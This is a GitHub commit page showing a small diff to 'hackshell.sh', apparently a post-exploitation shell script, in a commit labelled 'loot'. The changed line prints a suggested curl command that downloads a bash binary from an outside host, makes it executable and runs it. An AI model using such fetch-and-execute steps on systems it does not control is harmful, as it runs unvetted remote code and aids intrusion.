Skip to content

Commit

Permalink
loot
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Jul 10, 2024
1 parent 2d008ce commit 205c000
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion tools/hackshell.sh
Original file line number Diff line number Diff line change
Expand Up @@ -472,7 +472,7 @@ hs_init() {
local str

[ -z "$BASH" ] && { HS_WARN "Shell is not BASH. Try:
${CY}>>>>> ${CDC}curl -obash -SsfL 'https://bin.ajam.dev/$(uname -m)/bash && chmod 700 bash && exec bash -il'"; }
${CY}>>>>> ${CDC}curl -obash -SsfL 'https://bin.ajam.dev/$(uname -m)/bash && chmod 700 bash && exec bash -il'"; sleep 2; }
[ -n "$BASH" ] && [ "${prg##*\.}" = "sh" ] && { HS_ERR "Use ${CDC}source $prg${CDR} instead"; sleep 2; exit 255; }
[ -z "$UID" ] && UID="$(id -u)"
[ -n "$_HS_HOME_ORIG" ] && export HOME="$_HS_HOME_ORIG"
Expand Down

0 comments on commit 205c000

Please sign in to comment.